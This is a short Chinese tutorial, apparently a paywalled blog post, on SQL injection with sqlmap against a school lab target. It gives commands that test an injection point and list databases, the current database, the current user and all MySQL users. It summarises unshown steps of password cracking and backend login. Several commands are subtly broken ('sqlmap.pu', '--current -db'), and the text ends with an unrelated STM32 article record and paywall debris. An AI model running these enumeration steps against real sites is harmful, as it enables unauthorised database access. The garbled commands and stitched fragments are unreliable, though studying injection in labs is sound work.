攻击靶机
注:此为学校靶机
一、检测注入点是否可用
sqlmap存放路径>sqlmap.pu -u+"注入网址"

如果有若干询问语句,可添加一个参数
sqlmap存放路径>sqlmap.pu -u+"注入网址" --batch
二、暴库
1.数据库名称
sqlmap存放路径>sqlmap.pu -u+"注入网址" --dbs

三、web当前使用的数据库
sqlmap存放路径>sqlmap.pu -u+"注入网址" --current -db
四、web服务器使用的账户
sqlmap存放路径>sqlmap.pu -u+"注入网址" --current -user
五、列出MySQL所有用户
sqlmap存放路径>sqlmap.pu -u+"注入网址" --users

本文是一篇关于使用sqlmap进行数据库注入的实战教程,详细介绍了从检测注入点、暴库到破解密码、登录后台的全过程。在学校的靶机上,通过sqlmap的各个参数如-D, --table, --columns等,逐步揭示了数据库信息、用户信息和敏感数据,并最终成功登录后台。"
119373938,8246902,STM32G0B1CCT6 Flash Bank2 使用指南,"['stm32', 'c语言', '嵌入式开发', '微控制器', '嵌入式系统']
最低0.47元/天 解锁文章
8103

被折叠的 条评论
为什么被折叠?



